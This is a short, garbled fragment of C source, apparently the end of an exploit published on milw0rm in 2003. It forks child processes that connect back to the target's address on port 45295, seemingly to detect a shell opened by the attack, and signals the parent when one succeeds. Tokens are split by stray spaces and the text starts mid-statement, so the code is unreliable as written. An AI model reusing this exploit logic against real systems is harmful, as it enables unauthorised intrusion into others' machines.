2) close(sock); if ((sock2 = socket(AF_INET, SOCK_STREA M, 6)) < 0) { if (sock2 > 2) close(sock2); exit(-1); } if(Connect(sock2, (char *)inet_ntoa(add r1.sin_addr), 45295, 2) != -1) { if (sock2 > 2) close(sock2); kill(getppid(), SIGUSR1); } exit(1); } exit(0); break; case -1: fprintf(stderr, "+ fork() error\n"); exit(-1); break; default: if (i > MAX_CHILDS - 2) { wait(&status); i--; } break; } } } return 0; } // milw0rm.com [2003-04-10]